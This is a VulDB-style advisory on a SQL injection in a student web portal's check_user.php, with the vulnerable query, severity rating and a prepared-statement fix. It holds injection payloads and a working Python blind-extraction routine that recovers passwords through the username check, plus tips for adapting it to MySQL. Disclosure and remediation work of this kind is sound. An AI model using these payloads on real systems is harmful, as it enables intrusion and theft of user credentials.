Submission #748816: code-projects.org STUDENT WEB PORTAL IN PHP WITH SOURCE CODE 1.0 SQL Injection Info

Title: code-projects.org STUDENT WEB PORTAL IN PHP WITH SOURCE CODE 1.0 SQL Injection
Description: STUDENT WEB PORTAL IN PHP WITH SOURCE CODE SQL-INJECT

Summary
Student Web Portal In PHP With Source Code - Source Code & Projects contains a SQL Injection vulnerability in check_user.php due to unsafe string concatenation of the user-controlled username parameter into an SQL query. An unauthenticated remote attacker can supply a crafted username parameter to manipulate the database query logic, potentially enabling data disclosure and other impacts depending on database privileges and deployment configuration.

Vulnerability Details
Vulnerability Class: SQL Injection
CWE: CWE-89 (Improper Neutralization of Special Elements used in an SQL Command)
Affected Endpoint: /check_user.php?username=...
Affected Parameter: username (HTTP GET)
Affected Component/File: check_user.php
Database/API: MySQL via mysqli

Vulnerable Code (excerpt):
```php
// The raw GET value is spliced into the SQL text; a single quote in it ends the literal
$query = "select * from user where user_name='".$_GET['username']."'";
$table = mysqli_query($connection, $query);
```

Root Cause
User input from $_GET['username'] is directly concatenated into an SQL statement without parameterization, allowing an attacker to inject SQL syntax and alter query semantics.

Impact
Depending on the environment and database permissions, exploitation may allow:
- Manipulation of the username-existence check logic (inconsistent "already exist" vs "available" results, e.g. a free username reported as taken by appending an always-true condition)
- Blind SQL Injection (boolean/time-based) to infer database contents even when errors are suppressed, since the two response strings alone act as a one-bit oracle
- Potential sensitive data disclosure if the database account has broader read access
The exact impact depends on DB privileges, MySQL configuration (e.g., multi-statement settings), application behavior, and any upstream security controls.

Severity / CVSS
Recommended CVSS v3.1 Base Score: 7.5 (High)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Rationale: Remote, low complexity, no authentication, no user interaction; primary risk is confidentiality.
Remediation
Primary Fix: Use prepared statements (parameterized queries) and reduce query scope (select only what the existence check needs instead of `select *`, so a successful injection has less to return).

Secure Patch Example (mysqli prepared statement):
```php
<?php
error_reporting(0);   // keep database error text out of the HTTP response
include 'config.php'; // provides $connection

if (isset($_GET['username'])) {
    $username = $_GET['username'];
    // The user value is bound as a parameter; it is sent separately from the
    // SQL text and can never be parsed as SQL syntax.
    $stmt = mysqli_prepare($connection, "SELECT 1 FROM user WHERE user_name = ? LIMIT 1");
    if ($stmt) {
        mysqli_stmt_bind_param($stmt, "s", $username);
        mysqli_stmt_execute($stmt);
        mysqli_stmt_store_result($stmt);
        // LIMIT 1 means the row count is 0 or 1
        if (mysqli_stmt_num_rows($stmt) === 1) {
            echo "Username already exist.";
        } else {
            echo "Username Available";
        }
        mysqli_stmt_close($stmt);
    }
}
?>
```
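To make the Impact and Remediation sections concrete, the following added example (not the project's code or the submitter's) models both versions of check_user.php in Python against an in-memory SQLite database. The `user` table layout (id, user_name, password) and the two rows in it are constructed here as assumptions; the query strings mirror the excerpt above. It shows the always-true payload flipping the existence check, and a boolean-based blind extraction that recovers a password column using nothing but the two response strings as an oracle, then fails against the parameterized check.

```python
"""Vulnerable vs. parameterized username-existence check, with a blind-injection oracle.

Added example, not the project's PHP: the `user` table, its rows and the
charset are constructed so the script runs offline against SQLite.
"""
import sqlite3

EXISTS = "Username already exist."
AVAILABLE = "Username Available"
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"


def make_db():
    """Constructed sample data (assumption: a `user` table with user_name and password)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, user_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO user (user_name, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def check_user_vulnerable(conn, username):
    """Mirrors the vulnerable excerpt: the raw GET value is spliced into the SQL text."""
    query = "select * from user where user_name='" + username + "'"
    rows = conn.execute(query).fetchall()
    return EXISTS if rows else AVAILABLE


def check_user_fixed(conn, username):
    """Mirrors the patched version: the value is bound as a parameter, never parsed as SQL."""
    row = conn.execute("SELECT 1 FROM user WHERE user_name = ? LIMIT 1", (username,)).fetchone()
    return EXISTS if row else AVAILABLE


def blind_extract_password(check, target, max_len=32):
    """Boolean-based blind extraction using only the two response strings as an oracle.

    `check` is a callable taking the username string and returning EXISTS/AVAILABLE.
    Each payload closes the quoted literal, appends a condition on the target's row,
    and comments out the trailing quote the PHP code adds ("-- " with a trailing
    space is also the form MySQL requires). Returns None when the oracle never
    fires, which is what happens against the parameterized check.
    """
    def truthy(condition):
        return check(f"{target}' AND {condition} -- ") == EXISTS

    length = next((n for n in range(1, max_len + 1) if truthy(f"length(password)={n}")), None)
    if length is None:
        return None
    recovered = ""
    for i in range(1, length + 1):
        for c in CHARSET:
            if truthy(f"substr(password,{i},1)='{c}'"):
                recovered += c
                break
        else:
            return None  # character outside CHARSET; a real tool would widen the alphabet
    return recovered


if __name__ == "__main__":
    db = make_db()
    probe = "carol' OR '1'='1"
    print("vulnerable:", check_user_vulnerable(db, probe))   # taken, although carol is free
    print("fixed:     ", check_user_fixed(db, probe))        # available: no user literally named that
    print("blind, vulnerable:", blind_extract_password(lambda u: check_user_vulnerable(db, u), "alice"))
    print("blind, fixed:     ", blind_extract_password(lambda u: check_user_fixed(db, u), "alice"))
```

Two caveats when carrying this over to the real MySQL target: MySQL's default collations compare strings case-insensitively, so a character-by-character `substr()` probe there needs a `BINARY` cast to distinguish case; and the original `select *` fetches the entire row, which is why an existence check can leak any column of the table once a condition on that column can be injected. The parameterized version returns `None` from the extractor because every probe is looked up as a literal username that does not exist.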
Source: https://github.com/Qing-420/cve/blob/main/sql.md
User: TrySec (UID 94998)
Submitted: 2026-01-29 12:27 (3 months ago)
Moderation: 2026-02-07 09:50 (9 days later)
Status: Accepted
VulDB Entry: 344860 [code-projects Student Web Portal 1.0 /check_user.php username sql injection]
Points: 20
